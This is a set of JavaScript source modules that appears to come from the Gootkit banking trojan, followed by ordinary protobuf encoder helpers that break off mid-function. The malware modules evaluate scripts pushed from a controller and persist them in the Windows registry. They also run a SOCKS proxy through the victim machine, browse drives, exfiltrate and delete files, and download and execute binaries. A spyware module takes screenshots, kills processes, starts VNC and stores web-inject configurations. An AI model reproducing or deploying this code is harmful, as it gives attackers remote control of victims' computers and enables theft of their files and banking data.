		process.g_privateScript = ps;
		try
		{
			eval(process.g_privateScript);
		}
		catch(exception)
		{
			//print(exception);
			//print("g_privateScript script not executed");
		}

		if (process.OnPrivateJs)
			process.OnPrivateJs(process.g_privateScript);

		process.SpSavePrivate(process.g_privateScript);

	}
	else if (data[0] === PACKET_DEFAULT_SCRIPT)
	{
		process.g_defaultJs = data.slice(1).toString();
		//print('got process.g_defaultJs');

		try
		{
			eval(process.g_defaultJs);
		}
		catch (exception)
		{
			print(exception);
			//print("g_defaultJs script not executed");
		}

		if (process.OnDefaultJs)
			process.OnDefaultJs(process.g_defaultJs);

		process.SpSaveDefault(process.g_defaultJs);
	} else if (data[0] === PACKET_BODYPDATE)
	{
		//print('bodyupdate got');
		process.doUpdateBody(data.slice(1));
	}
}


exports.register = function (prtocolId, packetParsers, procolPacketBuilders) {
	//print('registering protcol dispatcher %d', prtocolId);

	MyPacketId = prtocolId;
	
	if(os.release().split('.')[0] === '5'){
		process.g_malwareBodyRegistryPath = "SOFTWARE";
	}else{
		process.g_malwareBodyRegistryPath = "SOFTWARE\\AppDataLow";
	}

	process.g_malwareRegistryPath = "SOFTWARE\\cxsw";
	process.g_malwareRegistryHive = HKEY_CURRENT_USER;
	process.g_SpDefaultKey = "{da14b39e-535a-4b08-9d68-ba6d14fed630}";
	process.g_SpPrivateKey = "{bed00948-29e2-4960-8f98-4bcd7c6b00a5}";

	process.SpLoadDefault();
	process.SpLoadPrivate();

	packetParsers[prtocolId] = OnPacket;
	procolPacketBuilders[prtocolId] = buildPacket;
}                                                                                                                                                                                                                                                                                                                                     

========

var fs = require('fs');
var zlib = require('zlib');
var net = require('net');
var stream = require('stream');
var util = require('util');
var dns = require('dns');

var MyPacketId;
var socksSessions = {};

var States = {
	CONNECTED: 0,
	VERIFYING: 1,
	READY: 2,
	PROXY: 3
};

var AuthMethods = {
	NOAUTH: 0,
	GSSAPI: 1,
	USERPASS: 2
};

var CommandType = {
	TCPConnect: 1,
	TCPBind: 2,
	UDPBind: 3
};

var AddressTypes = {
	IPv4: 0x01,
	DomainName: 0x03,
	IPv6: 0x04,

	read: function (buffer, offset) {
		if (buffer[offset] == AddressTypes.IPv4) {
				return util.format('%d.%d.%d.%d',
						buffer[offset + 1], buffer[offset + 2],
						buffer[offset + 3], buffer[offset + 4]);
		} else if (buffer[offset] == AddressTypes.DomainName) {
				var addrLength = buffer[offset + 1];
				return buffer.toString('utf8', offset + 2, offset + 2 + addrLength);
		} else if (buffer[offset] == AddressTypes.IPv6) {
				return buffer.slice(buffer[offset + 1], buffer[offset + 1 + 16])
		}
	},

	sizeOf: function (buffer, offset) {
		if (buffer[offset] == AddressTypes.IPv4) {
				return 4;
		} else if (buffer[offset] == AddressTypes.DomainName) {
				return buffer[offset + 1] + 1;
		} else if (buffer[offset] == AddressTypes.IPv6) {
				return 16;
		}
	}
};

function authorize(username, password) {
	return true;
}



function buildSocksPacket(connectionCookie, data){

	
	

	var socksPacketBuffer = new Buffer(data.length + 2 + 4);

	socksPacketBuffer.writeUInt16BE(MyPacketId, 0);
	socksPacketBuffer.writeUInt32BE(connectionCookie, 2);

	data.copy(socksPacketBuffer, 6);

	
	

	return socksPacketBuffer;
}

function IsCloseDoorPacket(connectionCookie, socksPacket) {
    if (socksPacket.length == 8) {
        if (socksPacket.readUInt32BE() === connectionCookie) {
            if (socksPacket.readUInt32BE(4) === 0xE1DDBEAF) {
                return true;
            }
        }
    }

    return false;
}

function BuildCloseDoorPacket(connectionCookie) {
    var b = new Buffer(8);

    b.writeUInt32BE(connectionCookie);
    b.writeUInt32BE(0xE1DDBEAF, 4);

    

    return b;
}

function CloseSocksConnections(outstream, connectionCookie)
{

    

	if (typeof (socksSessions[connectionCookie]) !== 'undefined') 
	{
	    
	    outstream.sendProtocolPacket(
			MyPacketId, connectionCookie, BuildCloseDoorPacket(connectionCookie));

		if(typeof (socksSessions[connectionCookie].proxy_connection) !== 'undefined') 
		{
			socksSessions[connectionCookie].proxy_connection.destroy();			
		}

		delete socksSessions[connectionCookie];
	} else {
	    
	}
}

function OnSocksPacket(outstream, data){
	
	
	
	

	var connectionCookie = data.readUInt32BE();
	var socksPacket = data.slice(4);

	

	if (typeof (socksSessions[connectionCookie]) === 'undefined') 
	{
	    if (IsCloseDoorPacket(connectionCookie, socksPacket)) {
	        return;
	    }

		let socksVersion = socksPacket[0];

		

		socksSessions[connectionCookie] = {
		    connectionCookie: connectionCookie,
		    pstate: States.CONNECTED
		};
	    
	    
        
		if(socksVersion === 5)
		{

		    let resp = new Buffer(2);

            resp[0] = 0x05;
            resp[1] = AuthMethods.NOAUTH;

            socksSessions[connectionCookie].pstate = States.READY;
            
            outstream.sendProtocolPacket(MyPacketId, connectionCookie, resp);

		}
		else
		{
		    
			CloseSocksConnections(outstream, connectionCookie);	
		}
	}
	else
	{

	    if (IsCloseDoorPacket(connectionCookie, socksPacket)) {

	        
            
	        

	        CloseSocksConnections(
                outstream, connectionCookie);
	        return;
	    }

		if (socksSessions[connectionCookie].pstate === States.READY) 
		{

			let offset = 3;
            let address = AddressTypes.read(socksPacket, offset);
            offset += AddressTypes.sizeOf(socksPacket, offset) + 1;
            let port = socksPacket.readUInt16BE(offset);

            if (
            	socksPacket[1] === CommandType.TCPConnect && 
            	typeof(address) !== 'undefined' && 
            	typeof(port) !== 'undefined'
            ){

                function continuConnectionToIp(error, remoteAddress) {
                    if (error === null) {

                        

                        var proxy_connection = net.createConnection({ port: port, host: remoteAddress });

                        proxy_connection.setNoDelay(true);
                        proxy_connection.on('connect', function () {

                            

                            let resp = new Buffer(10);
                            let addressParts = remoteAddress.split('.');

                            resp[0] = 0x05;
                            resp[1] = 0x00;
                            resp[2] = 0x00;
                            resp[3] = 0x01;

                            resp[4] = parseInt(addressParts[0]);
                            resp[5] = parseInt(addressParts[1]);
                            resp[6] = parseInt(addressParts[2]);
                            resp[7] = parseInt(addressParts[3]);

                            resp.writeUInt16BE(port, 8);

                            if (socksSessions[connectionCookie]) {
                                socksSessions[connectionCookie].pstate = States.PROXY;
                                socksSessions[connectionCookie].proxy_connection = proxy_connection;

                                outstream.sendProtocolPacket(MyPacketId, connectionCookie, resp);
                            }
                            else {
                                CloseSocksConnections(
                                    outstream, connectionCookie);
                            }

                            

                        }).on('error', function (error) {

                            

                            CloseSocksConnections(
                                outstream, connectionCookie);

                        }).on('close', function () {

                            
                            
                            

                            CloseSocksConnections(
                                outstream, connectionCookie);

                            
                        }).on('data', function (data) {

                            

                            if(outstream.sendProtocolPacket(
                                MyPacketId, connectionCookie, data) == false)
                            {
                                proxy_connection.pause();

                                outstream.once('drain', function () {
                                    setTimeout(function () {
                                        proxy_connection.resume();
                                    }, 10);

                                });

                            }
                        });
                    }
                    else {
                        CloseSocksConnections(
                            outstream, connectionCookie);
                    }
                }

                if (net.isIPv4(address)) {
                    
                    setTimeout(function () {
                        continuConnectionToIp(null, address);
                    }, 500);
                } else {

                    

                    dns.resolve4(address, function(error, ips){
                        setTimeout(function () {
                            continuConnectionToIp(error, ips ? ips[0] : null);
                        }, 500);
                    });
                }
            	

            	
            }
            else
            {
	            CloseSocksConnections(
	                outstream, connectionCookie);
            }
		}
		else if (socksSessions[connectionCookie].pstate === States.PROXY) 
		{

		    
		    

		    if( typeof(socksSessions[connectionCookie].proxy_connection) !== 'undefined')
		    {
		        socksSessions[connectionCookie]
                    .proxy_connection.write(socksPacket);

		    }
		}
	}
}

exports.on_disconnect = function () {
    for (var connectionCookie in socksSessions) {
        if (socksSessions[connectionCookie].proxy_connection) {
            socksSessions[connectionCookie].proxy_connection.destroy();
            delete socksSessions[connectionCookie];
        }
    }
}

exports.register = function (prtocolId, packetParsers, procolPacketBuilders) {
	

	MyPacketId = prtocolId;


	packetParsers[prtocolId] = OnSocksPacket;
	procolPacketBuilders[prtocolId] = buildSocksPacket;
}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                   

========

var fs = require('fs');
var path = require('path');
var zlib = require('zlib');
var net = require('net');
var stream = require('stream');
var util = require('util');
var suspend = require('suspend');
var cabfile = process.binding('cabfile');
var child_process = require('child_process');
var gzipper = require('tar_stream');

var protobuf = require('protocol_buffers')

var messages = protobuf([
  'message FileUpload {\r',
  '    optional string filename = 1;',
  '    optional bytes  content = 2;',
  '}',
  'message FileAttribues {\r',
  '    optional string name = 1;\r',
  '    optional string realname = 2;\r',
  '    optional bool isFile = 3;\r',
  '    optional bool isDirectory = 4;\r',
  '    optional bool isBlockDevice = 5;\r',
  '    optional bool isSymbolicLink = 6;\r',
  '    optional int64 size = 7;\r',
  '    optional int64 ctime = 8;\r',
  '    optional int64 atime = 9;\r',
  '}\r',
  '\r',
  'message DirectoryListing{\r',
  '    repeated FileAttribues files = 1;\r',
  '}' 
].join('\n'));

var print = console.log;
process.downloads = {};
var MyPacketId;


const FS_READDIR = 1;
const FS_GETFILE = 2;
const FS_GETMULTIPLEFILES = 3;
const FS_REMOVEMULTIPLEFILES = 4;
const FS_FILEEXECUTION = 5;

const FS_PUTFILE = 6;

function getRandomArbitrary(min, max) {
	return Math.floor(Math.random() * (max - min) + min);
}

function getRandomInt() {
	return getRandomArbitrary(0, 0xffffffff);
}


function BuildPacket(requestId, status, data)
{
	var packet;

	if(data){
		packet = new Buffer(
			2  +
			4  +
			1  +
			data.length
		);
	}
	else
	{
		packet = new Buffer(
			2  +
			4  +
			1 
		);
	}
	
	packet.writeUInt16BE(MyPacketId, 0);
	packet.writeUInt32BE(requestId, 2);
	packet.writeUInt8(status, 6);

	if(data)
		data.copy(packet, 7);

	return packet;
}

var OnPacket = suspend(function*(outstream, data) 
{
	
	var func = data.readUInt8();
	var requestId = data.readUInt32BE(1);

	

	try
	{
		switch(func)
		{

			case FS_READDIR:

				var directory_path = data.slice(5).toString('utf8');
				
				var out_files = [];

				if (directory_path === '[DRIVES_LIST]') {

					let letters = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ';

					for (var i = 0; i < letters.length; i++) {
						try {

							var drive = letters.charAt(i) + ':\\';
							var stat = yield fs.stat(drive, suspend.resume());

							out_files.push
							({
								'name': drive,
								'directory_path': drive
							});

						} catch (e) {

						}
					}
				}
				else 
				{
					try 
					{
					  
						let files = yield fs.readdir(directory_path, suspend.resume());

						let currentDirectory = path.resolve(directory_path);
						let parentDirectory = path.resolve(path.join(directory_path, '..'));
						
						
						

						if (parentDirectory === currentDirectory) {
							parentDirectory = '[DRIVES_LIST]';
						}

						

						out_files.push({ 
							name: '..', 
							realname: parentDirectory,
							isDirectory : true
						});

						for (let i = 0; i < files.length; i++) 
						{
							let filename = path.join(directory_path, files[i]);

							try{
								var stat = yield fs.stat(filename, suspend.resume());
								if (stat) {
									out_files.push({
										name: files[i],
										realname: filename,
										isFile: stat.isFile(),
										isDirectory: stat.isDirectory(),
										isBlockDevice: stat.isBlockDevice(),
										isSymbolicLink: stat.isSymbolicLink(),
										size: stat.size,
										ctime: stat.ctime.getTime(),
										atime: stat.atime.getTime()
									});
								}
							}catch(exceptionx){
								out_files.push({
									name: files[i],
									realname: filename
								});
							}
						}
					} 
					catch (exc) 
					{
						print(exc);
						outstream.sendProtocolPacket(
							MyPacketId, requestId, 
							0xFE, new Buffer(exc.message));
						return;
					}
				}

				

				var buffer = messages.DirectoryListing.encode({files : out_files});

				outstream.sendProtocolPacket(
					MyPacketId, requestId, 0x00, buffer);

				break;
				
			case FS_GETFILE :
				var filename = data.slice(5).toString('utf8');
				

				outstream.pushFileToServer(filename, requestId);


				break;

			case FS_GETMULTIPLEFILES :

				var filenames = data.slice(5).toString('utf8').split('|');
				var cabFilePath =  path.join(process.env['temp'], (new Date().getTime() + '.cab'));
				var tmpDirectory =  path.join(process.env['temp'], new Date().toUTCString().replace(/\:|\s+|\,/g,'_') );

				print('tmpDirectory %s', tmpDirectory);

				fs.mkdirSync(tmpDirectory);
				fs.writeFileSync(
					tmpDirectory + "\\descr.txt", 
					[
						"Uploaded by Gootkit :D",
						"botid : ",
						process.machineGuid,
						"",
						"Date : ",
						new Date().toUTCString(),
						"",
						"Original filenames : ",
						"",
						filenames.join("\r\n")
					].join("\r\n")
				);

				for(let i = 0; i < filenames.length; i ++){

					var remotepath = path.join(tmpDirectory, path.basename(filenames[i]));

					if(fs.lstatSync(filenames[i]).isDirectory()){
						
						fs.mkdirSync(remotepath);
						
						var result = yield fs.ncp(
							filenames[i], 
							remotepath, 
							{limit : 512},
							suspend.resume() 
						);
					}else{
						var result = yield fs.copyFile(filenames[i], remotepath, suspend.resume() );
					}				    
				}

				gzipper.gzcompress({
					source: tmpDirectory,
					destination: tmpDirectory + '_.tar.gz',
					level: 6, 
					memLevel: 6 
				}, function () {
					setTimeout(function(){
						outstream.pushFileToServer(tmpDirectory + '_.tar.gz', requestId, true);
						fs.removeRecursive(tmpDirectory, function(){});
					}, 100);  
				});

				break;

			case FS_REMOVEMULTIPLEFILES :

				var filenames = data.slice(5).toString('utf8').split('|');
				
				
				try
				{	
					for(let i = 0; i < filenames.length; i ++)
					{
						try
						{
							let x = yield fs.unlink(filenames[i], suspend.resume());
						}
						catch (exc) 
						{

						}
					};

					outstream.sendProtocolPacket(
						MyPacketId, requestId, 0x00);
				}
				catch (exc) 
				{
					print(exc);
					outstream.sendProtocolPacket(
						MyPacketId, requestId, 
						0xFE, new Buffer(exc.message));
					return;
				}

				break;
			case FS_FILEEXECUTION :
				var fileBuffer = data.slice(5);
				
				var filepath = path.join(process.env['temp'], getRandomInt() + '.exe');
				
				fs.writeFile(filepath, fileBuffer, function(error){
					if(error)
					{
					    

						outstream.sendProtocolPacket(
							MyPacketId, requestId, 0xFE, 
							new Buffer(error.message));
					}
					else
					{
					    
						child_process.execFile(filepath);
						outstream.sendProtocolPacket(
							MyPacketId, requestId, 0x00, new Buffer(filepath));
					}
				});

				break;
		    case FS_PUTFILE :
		        var requestData = data.slice(5);
		        
		        

		        if(!process.downloads[requestId])
		        {
		            process.downloads[requestId] = {};

		            var dwnl = process.downloads[requestId];

		            dwnl.done = 0;
		            dwnl.length = requestData.readUInt32BE(0);
		            dwnl.filename = requestData.toString('utf8', 0 + 4 + 2 , requestData.readUInt16BE(4) + 0 + 4 + 2);
				    
		            dwnl.filepath = path.join(process.env['temp'], dwnl.filename);

		            
		            

		            dwnl.writeStream = fs.createWriteStream(dwnl.filepath);
		            process.log('download started : ', dwnl.filepath, ' length:', dwnl.length);

		        }else{
                    
		            var dwnl = process.downloads[requestId];

		            dwnl.done += requestData.length;

		            

		            if(dwnl.writeStream.write(requestData) === false){

		                outstream.botSocket.pause();
		                outstream.pause();

		                dwnl.writeStream.once('drain', function(){
		                    outstream.botSocket.resume();
		                    outstream.resume();
		                })
		            }

		            if(dwnl.done === dwnl.length)
		            {
		                

		                

		                dwnl.writeStream.on('finish', function() 
		                {
		                    dwnl.writeStream.close();

		                    outstream.botSocket.resume();
		                    outstream.resume();

		                    outstream.sendProtocolPacket(
							    MyPacketId, requestId, 0x00, new Buffer(dwnl.filepath));

		                    process.log('file downloaded', dwnl.filepath);

		                    delete process.downloads[requestId];

		                });

		                dwnl.writeStream.end();
		            }

		        }
		        


		        break;
			default:
				outstream.sendProtocolPacket(
					MyPacketId, requestId, 0xFF);
				break;
			
		}

	}
	catch(exception)
	{
	    
	    
		
		outstream.sendProtocolPacket(
			MyPacketId, requestId, 0xFE, 
			new Buffer(exception.message));
	}

});

var uploadLocalFile = suspend(function*(filename, cb)
{
	if(!util.isUndefined(process.controllerConnection))
	{
		process.controllerConnection.sendProtocolPacket(
			MyPacketId, 
			FS_PUTFILE, 
			0x00, 
			new Buffer(filename)
		);
	}
});

exports.register = function (prtocolId, packetParsers, procolPacketBuilders) {
	

	MyPacketId = prtocolId;

	process.uploadLocalFile = uploadLocalFile;
	packetParsers[prtocolId] = OnPacket;
	procolPacketBuilders[prtocolId] = BuildPacket;
}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                         

========

var fs = require('fs');
var path = require('path');
var zlib = require('zlib');
var net = require('net');
var stream = require('stream');
var util = require('util');
var suspend = require('suspend');
var spyware = process.binding("spyware");
var reg = process.binding("registry");

var protobuf = require('protocol_buffers')

var messages = protobuf(
    'message RedirectionEntry\r\n{\r\noptional string name = 1;\r\noptional string uri = 2;\r\noptional string keyword = 3;\r\noptional string uripassword = 4;\r\noptional string datapassword = 5;\r\n}' +
    'message ProcessModule {\r\n\toptional string szExePath = 1;\r\n\toptional uint32 GlblcntUsage = 2;\r\n\toptional uint64 hModule = 3;\r\n\toptional uint64 modBaseAddr = 4;\r\n\toptional uint64 modBaseSize = 5;\r\n\toptional uint32 ProccntUsage = 6;\r\n\toptional uint32 pcPriClassBase = 7;\r\n\toptional uint32 dwFlags = 8;\r\n\toptional string szModule = 9;\r\n\toptional uint32 th32ModuleID = 10;\r\n\toptional uint32 th32ProcessID = 11;\r\n}\r\n\r\nmessage Process {\r\n\toptional string szExeFile = 1;\r\n\toptional uint32 cntUsage = 2;\r\n\toptional uint32 th32ProcessID = 3;\r\n\toptional uint32 th32ModuleID = 4;\r\n\toptional uint32 cntThreads = 5;\r\n\toptional uint32 th32ParentProcessID = 6;\r\n\toptional uint32 pcPriClassBase = 7;\r\n\toptional uint32 dwFlags = 8;\r\n\toptional bool\towned = 9;\r\n\trepeated ProcessModule modules = 10;\r\n}\r\n\r\nmessage ProcessList {\r\n \trepeated Process Processes = 1;\r\n}\r\n\r\nmessage BaseEntryBlock \r\n{\r\n\toptional string url = 1;\r\n\toptional bool enabled = 2 [default = true];\r\n\trepeated string guids = 3;\r\n\toptional bool filt_get = 4 [default = true];\r\n\toptional bool filt_post = 5 [default = true]; \r\n}\r\n\r\n\r\nmessage SpywareConfigEntry\r\n{\r\n\trequired BaseEntryBlock base = 1;\r\n\r\n\toptional string data_before = 2;\r\n\toptional string data_inject = 3;\r\n\toptional string data_after = 4;\r\nrepeated string stoplist = 5;\r\n}\r\n\r\nmessage VideoConfigEntry\r\n{\r\n\trequired BaseEntryBlock base = 1;\r\n\r\n\toptional bool grayScale = 2 [default = true];\r\n\toptional int32 framerate = 3 [default = 5];\r\n\toptional int32 seconds = 4 [default = 30];\r\n\toptional string filenameMask = 5;\r\n\toptional bool uploadAfterRecord = 6 [default = true];\r\n\toptional string hashkey = 7;\r\n}\r\n\r\n\r\nmessage FragmentConfigEntry\r\n{\r\n    required BaseEntryBlock base = 1;\r\n\r\n    optional string data_before = 2;\r\n    optional string data_after = 3;\r\n}\r\n\r\nmessage MailFilterEntry \r\n{\r\n\toptional string from = 1;\r\n\toptional string to = 2;\r\n\toptional string subject = 3;\r\n\toptional string body = 4;\r\n}\r\n\r\n\r\nmessage SpywareConfig \r\n{\r\n    repeated SpywareConfigEntry injects = 1;\r\n    repeated VideoConfigEntry recorders = 2;\r\n\trepeated FragmentConfigEntry fragmets = 3;\r\n\trepeated MailFilterEntry emailfilter = 4;\r\nrepeated RedirectionEntry redirects = 5;\r\n}'
);

const SP_SCREENSHOT = 1;
const SP_PROCESSLIST = 2;
const SP_PROCESKILL = 3;
const SP_SPYWARE_CONFIG = 4;
const SP_START_VNC = 5;

var MyPacketId;

function RegReadObject(keyname) {
	var x = new reg.WindowsRegistry(
		process.g_malwareRegistryHive, 
		process.g_malwareRegistryPath, KEY_READ, true
	);
	var valueType = x.GetDataType(keyname);
	if (valueType == REG_BINARY) 
	{
		return x.ReadBuffer(keyname);
	} 
	else if (valueType == REG_SZ) 
	{
		return x.ReadString(keyname);
	} 
	else if (valueType == REG_DWORD) 
	{
		return x.ReadDword(keyname);
	}
}

function RegWriteObject(keyname, obj) {
	var x = new reg.WindowsRegistry(
		process.g_malwareRegistryHive, 
		process.g_malwareRegistryPath, KEY_WRITE, true
	);

	if (Buffer.isBuffer(obj)) 
	{
		return x.WriteBuffer(keyname, obj);
	} 
	else if (typeof obj == "string") 
	{
		return x.WriteString(keyname, obj);
	} 
	else return -1;
}

process.SpLoadConfig = function() {
	try 
	{
		process.g_scfg = '';
		var readedBuffer = RegReadObject(process.g_SpConfigKey);

		if (typeof (readedBuffer) !== 'undefined') 
		{
			readedBuffer.encryptDecrypt();
			process.configBlob = readedBuffer;
			process.g_scfg = messages.SpywareConfig.decode(readedBuffer);
			
		} 
	} 
	catch (e) 
	{
		
	}
}

process.SpSaveConfig = function (config) 
{
	var encryptedcfg = new Buffer(config);
	encryptedcfg.encryptDecrypt()

	RegWriteObject(
		process.g_SpConfigKey,
		encryptedcfg
	);
}

function BuildPacket(requestId, status, data)
{
	var packet;

	if(data){
		packet = new Buffer(
			2  +
			4  +
			1  +
			data.length
		);
	}
	else
	{
		packet = new Buffer(
			2  +
			4  +
			1 
		);
	}
	
	packet.writeUInt16BE(MyPacketId, 0);
	packet.writeUInt32BE(requestId, 2);
	packet.writeUInt8(status, 6);

	if(data)
		data.copy(packet, 7);

	return packet;
}

function IsProcessOwned(pid)
{

	if(pid === process.pid)
	{
		return true;
	}

	if(util.isUndefined(process.slaveServer))
	{
		return false;
	}

	for(let i = 0; i < process.slaveServer.clients.length; i ++)
	{
		if(util.isUndefined(process.slaveServer.clients[i].botSocket.process))
		{
			continue;
		}


		if(process.slaveServer.clients[i].botSocket.process.pid.toString() === pid.toString())
		{
			return true;
		}
	}

}
var OnPacket = suspend(function*(outstream, data) 
{
	
	if(data.length <= 5){
		return;
	}

	var func = data.readUInt8();
	var requestId = data.readUInt32BE(1);

	
	
	

	try
	{
		switch(func)
		{
			case SP_START_VNC : 
				require('spyware').startVncServer();
				outstream.sendProtocolPacket(
					MyPacketId, requestId, 0x00, new Buffer([0x00]));
				break;
			case SP_SCREENSHOT :
				var screen = spyware.SpTakeScreenshot(data.readUInt8(5));

				outstream.sendProtocolPacket(
					MyPacketId, requestId, 0x00, screen);

				break;
			case SP_PROCESSLIST : 

				var processesDump = spyware.SpGetProcessList();
				
				for(let i = 0; i < processesDump.length; i ++)
				{
					if(IsProcessOwned(processesDump[i].th32ProcessID))
					{
						processesDump[i].owned = true;
					}
				}

				if(data.readUInt8(5) === 0)
				{

					for(let i = 0; i < processesDump.length; i ++)
					{
						processesDump[i].modules = [];
					}
				}

				var encodedPacket = messages.ProcessList.encode({
					Processes : processesDump
				});

				outstream.sendProtocolPacket(
					MyPacketId, requestId, 0x00, encodedPacket);

				break;
			case SP_PROCESKILL :
				var pid = data.readUInt32BE(5)

			    try{
			        if(process.kill(pid))
			        {
			            outstream.sendProtocolPacket(MyPacketId, requestId, 0x00);
			        }
			        else
			        {
			            outstream.sendProtocolPacket(MyPacketId, requestId, 0xFF);
			        }

			    }catch(e)
			    {
			        outstream.sendProtocolPacket(MyPacketId, requestId, 0xFF);
			    }

				break;
			case SP_SPYWARE_CONFIG:
				var cfg = data.slice(1);
				process.configBlob = cfg;
				process.g_scfg = messages.SpywareConfig.decode(cfg);
				
				
				
				process.SpSaveConfig(cfg);

				if(process.OnSpConfig)
					process.OnSpConfig(JSON.stringify(process.g_scfg));

				break;
			default:
				outstream.sendProtocolPacket(
					MyPacketId, requestId, 0xFF);
				break;	
		}

	}
	catch(error)
	{
		print(error);
		print(error.stack);
		print(error.message);
		outstream.sendProtocolPacket(
			MyPacketId, requestId, 0xFE, 
			new Buffer(error.message));
	}

});

exports.register = function (prtocolId, packetParsers, procolPacketBuilders) {
	

	process.g_malwareRegistryPath = "SOFTWARE\\cxsw";
	process.g_malwareRegistryHive = HKEY_CURRENT_USER;
	process.g_SpConfigKey = "{c1e2bc64-8d94-461f-a485-50a7322bfb4a}";
	process.SpLoadConfig();

	MyPacketId = prtocolId;
	
	packetParsers[prtocolId] = OnPacket;
	procolPacketBuilders[prtocolId] = BuildPacket;
}                                                                                                                                                                                                                                                                                                          

========

var util = require('util')

var last = function(str) {
  str = str.trim()
  return str[str.length-1]
}

var first = function(str) {
  return str.trim()[0]
}

var notEmpty = function(line) {
  return line.trim()
}

var notEmptyElse = function() {
  var notNext = false
  return function(line, i, lines) {
    if (notNext) {
      notNext = false
      return ''
    }
    if (lines[i].trim() === '} else {' && (lines[i+1] || '').trim() === '}') {
      notNext = true
      return lines[i].replace('} else {', '}')
    }
    return line
  }
}

module.exports = function() {
  var lines = []
  var indent = 0

  var push = function(str) {
    var spaces = ''
    while (spaces.length < indent*2) spaces += '  '
    lines.push(spaces+str)
  }

  var line = function(fmt) {
    if (!fmt) return line

    if (fmt.trim()[0] === '}' && fmt[fmt.length-1] === '{') {
      indent--
      push(util.format.apply(util, arguments))
      indent++
      return line
    }
    if (fmt[fmt.length-1] === '{') {
      push(util.format.apply(util, arguments))
      indent++
      return line
    }
    if (fmt.trim()[0] === '}') {
      indent--
      push(util.format.apply(util, arguments))
      return line
    }

    push(util.format.apply(util, arguments))
    return line
  }

  line.trim = function() {
    lines = lines
      .filter(notEmpty)
      .map(notEmptyElse())
      .filter(notEmpty)
    return line
  }

  line.toString = function() {
    return lines.join('\n')
  }

  line.toFunction = function(scope) {
    var src = 'return ('+line.toString()+')'

    var keys = Object.keys(scope || {}).map(function(key) {
      return key
    })

    var vals = keys.map(function(key) {
      return scope[key]
    })

    return Function.apply(null, keys.concat(src)).apply(null, vals)
  }

  if (arguments.length) line.apply(null, arguments)

  return line
}


========

function isProperty(str) {
  return /^[^0-9\/\\.\-+*!~()\[\];:?'"<>,{}|`~%\^& \f\n\r\t\v​\u00a0\u1680​\u180e\u2000​\u2001\u2002​\u2003\u2004​\u2005\u2006​\u2007\u2008​\u2009\u200a​\u2028\u2029​​\u202f\u205f​\u3000]\w*$/.test(str)
}
var gen = function(obj, prop) {
  return isProperty(prop) ? obj+'.'+prop : obj+'['+JSON.stringify(prop)+']'
}

gen.valid = isProperty
module.exports = gen

========

var varint = require('varint')
var svarint = require('signed_varint')

var encoder = function(type, encode, decode, encodingLength) {
  encode.bytes = decode.bytes = 0

  return {
    type: type,
    encode: encode,
    decode: decode,
    encodingLength: encodingLength
  }
}

exports.make = encoder

exports.bytes = function(tag) {
  var encodingLength = function(val) {
    return varint.encodingLength(val.length) + val.length
  }

  var encode = function(val, buffer, offset) {
    var oldOffset = offset

    varint.encode(val.length, buffer, offset)
    offset += varint.encode.bytes

    val.copy(buffer, offset)
    offset += val.length

    encode.bytes = offset - oldOffset
    return buffer
  }

  var decode = function(buffer, offset) {
    var oldOffset = offset

    var len = varint.decode(buffer, offset)
    offset += varint.decode.bytes

    var val = buffer.slice(offset, offset+len)
    offset += val.length

    decode.bytes = offset - oldOffset
    return val
  }

  return encoder(2, encode, decode, encodingLength)
}()

exports.string = function() {
  var encodingLength = function(val) {
    return varint.encodingLength(val.length) + Buffer.byteLength(val)
  }

  var encode = function(val, buffer, offset) {
    var oldOffset = offset
    var len = Buffer.byteLength(val)

    varint.encode(len, buffer, offset, 'utf-8')
    offset += varint.encode.bytes

    buffer.write(val, offset, len)
    offset += len

    encode.bytes = offset - oldOffset
    return buffer
  }

  var decode = function(buffer, offset) {
    var oldOffset = offset

    var len = varint.decode(buffer, offset)
    offset += varint.decode.bytes

    var val = buffer.toString('utf-8', offset, offset+len)
    offset += len

    decode.bytes = offset - oldOffset
    return val
  }

  return encoder(2, encode, decode, encodingLength)
}()

exports.bool = function() {
  var encodingLength = function(val) {
    return 1
  }

  var encode = function(val, buffer, offset) {
    buffer[offset] = val ? 1 : 0
    encode.bytes = 1
    return buffer
  }

  var decode = function(buffer, offset) {
    var bool = buffer[offset] > 0
    decode.bytes = 1
    return bool
  }

  return encoder(0, encode, decode, encodingLength)
}()

exports.int32 = function() {
  var decode = function(buffer, offset) {
    var val = varint.decode(buffer, offset)
    decode.bytes = varint.decode.bytes
    return val > 2147483647 ? val - 4294967296 : val
  }

  var encode = function(val, buffer, offset) {
    varint.encode(val < 0 ? val + 4294967296 : val, buffer, offset)
    encode.bytes = varint.encode.bytes
    return buffer
  }

  var encodingLength = function(val) {
    return varint.encodingLength(val < 0 ? val + 4294967296 : val)
  }

  return encoder(0, varint.encode, decode, encodingLength)
}()

exports.sint32 =
exports.sint64 = function() {
  return encoder(0, svarint.encode, svarint.decode, svarint.encodingLength)
}()

exports.int64 = 
exports.uint32 =
exports.uint64 =
exports.enum =
exports.varint = function() {
  return encoder(0, varint.encode, varint.decode, varint.encodingLength)
}()


exports.fixed64 =
exports.sfixed64 = function() {
  var encodingLength = function(val) {
    return 8
  }

  var encode = function(val, buffer, offset) {
    val.copy(buffer, offset)
    encode.bytes = 8
    return buffer
  }

  var decode = function(buffer, offset) {
    var val = buffer.slice(offset, offset + 8)
    decode.bytes = 8
    return val
  }

  return encoder(1, encode, decode, encodingLength)
}()

exports.double = function() {
  var encodingLength = function(val) {
    return 8
  }

  var encode = function(val, buffer, offset) {
    buffer.writeDoubleLE(val, offset)
    encode.bytes = 8
    return buffer
  }

  var decode = function(buffer, offset) {
    var val = buffer.readDoubleLE(offset)
    decode.bytes = 8
    return val
  }

  return encoder(1, encode, decode, encodingLength)
}()

exports.fixed32 = function() {
  var encodingLength = function(val) {
    return 4
  }

  var encode = function(val, buffer, offset) {
    buffer.writeUInt32LE(val, offset)
    encode.bytes = 4
    return buffer
  }

  var decode = function(buffer, offset) {
    var val = buffer.readUInt32LE(offset)
    decode.bytes = 4
    return val
  }

  return encoder(5, encode, decode, encodingLength)
}()

exports.sfixed32 = function() {
  var encodingLength = function(val) {
    return 4
  }

  var encode = function(val, buffer, offset) {
    buffer.writeInt32LE(val, offset)
    encode.bytes = 4
    return buffer
  }

  var decode = function(buffer, offset) {
    var val = buffer.readInt32LE(offset)
